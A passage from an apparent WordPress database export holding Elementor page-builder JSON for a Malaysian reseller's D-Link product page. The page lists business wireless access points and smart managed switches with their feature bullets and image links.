SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":29},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<br \\/>\\u2022 Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<br \\/>\\u2022 Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Access Control List (ACL) feature to enhances network security<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Built-in SNMP MIB for remote Network\\u00a0Management Systems<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>\\u2022\\u00a0Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>\\u2022\\u00a0Virtual stacking of up to 32 units via D-link\\u2019s\\u00a0Single IP\\u00a0Management (SIM)<\\/p><p>\\u2022\\u00a0Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>\\u2022\\u00a0Auto Surveillance (ASV), Auto Voice\\u00a0VLAN for VoIP and Video Surveillance deployments.<\\/p><p>\\u2022\\u00a0802.1X port based\\u00a0authentication, for authentication through\\u00a0external RADIUS servers<\\/p><p>\\u2022\\u00a0IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>\\u2022\\u00a0Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>\\u2022\\u00a0Support\\u00a0Layer 2 Features \\u2013\\u00a0IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7276,3368,'_elementor_version','2.5.14'),(7277,3368,'_elementor_edit_mode','builder'),(7280,3369,'_wp_page_template','template-fullwidth.php'),(7281,3369,'_elementor_template_type','post'),(7282,3369,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":49},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"149\",\"right\":\"149\",\"bottom\":\"149\",\"left\":\"149\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"50\",\"bottom\":\"50\",\"left\":\"50\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"78\",\"right\":\"78\",\"bottom\":\"78\",\"left\":\"78\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":19},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>\\u2022 MU-MIMO with beamforming<\\/p><p>\\u2022 Band steering<\\/p><p>\\u2022 Gigabit PoE-capable LAN port<\\/p><p>\\u2022 AP Array utility support<\\/p><p>\\u2022 Free D-Link Central WiFiManager<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Enjoy High-performance Wireless Connectivity<\\/p><p>\\u2013 Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><p>MU-MIMO with Beamforming<\\/p><p>\\u2013 Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><p>Multiple Operational Modes<\\/p><p>-Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>\\u2022 Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>\\u2022 Gigabit Ethernet port with 802.3af Power over Ethernet<\\/p><p>\\u2022 Multiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>\\u2022 Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>\\u2022 Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>\\u2022 Support Central WiFi Manager to configure and manage multiple AP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0912f1d\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<br \\/>\\u2022 Suitable for virtualization, cloud services and server-to-server applications<br \\/>\\u2022 D-link Green Technology conserves energy by powering down unused ports<br \\/>\\u2022 Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<br \\/>\\u2022 Support G.8032 ERPS to achieve high reliability and network stability<br \\/>\\u2022 802.1X port based authentication, for authentication through external RADIUS servers<br \\/>\\u2022 Support D-Link Network Assistant Utility to simplifies the configuration<br \\/>\\u2022 Loopback Detection automatically disables port or VLAN when a loop is detected<br \\/>\\u2022 Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u2022 24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<br \\/>\\u2022 Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<br \\/>\\u2022 Support IEEE 802.1Q VLAN traffic segregation<br \\/>\\u2022 Auto Surveillance VLAN for easy integration with IP-based surveillance systems<br \\/>\\u2022 Loopback detection (LBD) and broadcast storm control to avoid network downtime<br \\/>\\u2022 Quality of Service (QOS) and bandwidth control to ensure smooth operation<br \\/>\\u2022 Cable diagnostics function to help troubleshooting wiring problem<br \\/>\\u2022 Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p><p>[maxbutton id=\\\"6\\\" 